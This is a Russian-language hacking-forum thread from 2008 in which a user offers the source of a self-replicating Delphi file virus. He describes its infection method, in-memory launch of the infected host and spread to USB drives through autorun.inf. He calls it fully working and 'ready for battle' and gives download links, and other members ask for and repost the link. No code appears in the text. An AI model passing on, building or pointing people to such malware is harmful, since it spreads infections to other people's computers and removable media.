Вирус на Delphi весом 3333 байт

Discussion in 'С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby' started by execom, 5 May 2008.

  1. execom

    execom Elder - Старейшина

    Joined:
    5 Jun 2007
    Messages:
    46
    Likes Received:
    71
    Reputations:
    18
    Предлагаю вашему внимания исходник файлового вируса на delphi.

    Особености:

    1)ЗАРАЖЕНИЕ - заражение без каких либо временных файлов и ненужных копирований жертвы, сначала из начала копируется в конец кусок жертвы размером как вирь и шифруется.

    2)ЗАПУСК ЖЕРТВЫ - запуск жертвы из которой запущен вирус осуществляется в конце поиска и заражения файлов и делается он не как часто бывает в HLLP вирусах путём копирования жертвы в темп с дальнейшим её запуском, а напрямую в память.

    3)ЗАРАЖЕНИЕ ФЛЭШЕК - вирус осуществляет заражение флешкарт, путём копирования себя на флэшь и создания там соответствующего autorun.inf

    4)КОМПИЛЯЦИЯ - для компиляции вируса необходимо
    иметь установленый Delphi. Качаем архив, разархивируем его, запускам vir.bat, после этого в папке с исходником появляется готовый к бою вирус vir.exe весом 3333 байт.

    Скачать этот сорец можно ТУТ
     
    7 people like this.
  2. Jes

    Jes Elder - Старейшина

    Joined:
    16 Apr 2007
    Messages:
    370
    Likes Received:
    391
    Reputations:
    34
    а какова 'Полезная нагрузка' ? (или это демонстрация самого алгоритма?)
     
    #2 Jes, 5 May 2008
    Last edited: 5 May 2008
  3. execom

    execom Elder - Старейшина

    Joined:
    5 Jun 2007
    Messages:
    46
    Likes Received:
    71
    Reputations:
    18
    Я считаю себя сугубо теоретиком вирусологии, поэтому ни каких диструктивных нагрузок вирус не несёт, этим хламом его может наполнить любой хулиганистый ламер))) В принципе трудно назвать 37килобайтный, набитый коментами, сорец, простой демонстрацией алгоритма... Это полностью рабочий и достаточно живучий гадёнышь, который вполне может поселиться и в вашей системе)))
    Ну а на практике - это учебный материал по использованию API в Delphi...
     
  4. YoYo Factory

    YoYo Factory Elder - Старейшина

    Joined:
    24 Mar 2008
    Messages:
    108
    Likes Received:
    79
    Reputations:
    -5
    [offtop]Перезалейте плиз![/offtop]
     
  5. qPhoenix

    qPhoenix Banned

    Joined:
    15 Dec 2005
    Messages:
    87
    Likes Received:
    50
    Reputations:
    8
    http://dump.ru/files/p/p618100455/
    хотя и верхняя ссыль норм пашет..
     
    2 people like this.